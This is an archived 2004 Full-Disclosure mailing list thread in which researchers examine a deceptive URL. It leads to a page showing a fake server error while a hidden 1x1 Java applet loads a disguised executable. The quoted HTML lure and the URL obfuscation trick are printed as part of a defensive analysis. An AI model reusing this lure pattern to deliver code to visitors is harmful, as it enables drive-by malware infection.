Full Disclosure mailing list archives
RE: [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747
From: "Aditya, ALD [Aditya Lalit Deshmukh]" <aditya.deshmukh () online gateway technolabs net>
Date: Mon, 16 Feb 2004 10:08:47 +0530
this is not a zip file - its a windows exe complete with a MZ header and calls to LoadLibraryA & GetProcAddress exported from KERNEL32.dll am debugging thu it - to see what exactly it does... (this one is real good) but how come ie and mozilla started it up as a java applet without any error message ? -aditya
-----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com]On Behalf Of Nicola Fankhauser Sent: Monday, February 16, 2004 12:50 AM To: full-disclosure () lists netsys com Subject: [Full-Disclosure] Re: [Full-disclosure] http://federalpolice.com:article872@1075686747 hi jedi On Sun, 2004-02-15 at 18:45, Jedi/Sector One wrote:This is equivalent to http://64.29.173.91/ok, and the html of the index page is as following: <html><body bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff> <h2>SERVER ERROR 550</h2> <applet ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></applet></body></html> now, the "SERVER ERROR 550" is clearly a fake - the java applet below just starts fine. strangely, the 'javautil.zip' is not a valid zip-file, yet 'appletviewer' and mozilla (don't know about MS IE; too dangerous :) happily start the applet without any hickups or exceptions and mozilla states 'Applet BlackBox started' in the status bar. is there anybody knowledgable interested in un-zipping, de-compiling and analysing this surely malicious applet? I would like to know what mozilla just executed on my behalf there... :( FYI, the file 'javautil.zip' attached is directly taken from the site mentioned above. regards nicola
________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Buffer overflow in mnoGoSearch Jedi/Sector One (Feb 15)
- http://federalpolice.com:article872@1075686747 Lee (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 jan . muenther (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Lee (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Jedi/Sector One (Feb 15)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Nicola Fankhauser (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Erik van Straten (Feb 15)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Byron Copeland (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 D.J. Capelis (Feb 15)
- RE: [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Aditya, ALD [Aditya Lalit Deshmukh] (Feb 16)
- Re: http://federalpolice.com:article872@1075686747 jan . muenther (Feb 15)
- http://federalpolice.com:article872@1075686747 Lee (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Cael Abal (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 John Galt (Feb 18)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 B3r3n (Feb 15)
- RE: http://federalpolice.com:article872@1075686747 Bill Royds (Feb 15)
- [Full-Disclosure] Re: http://federalpolice.com:article872@1075686747 Noldata TAC (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 Alain (Feb 16)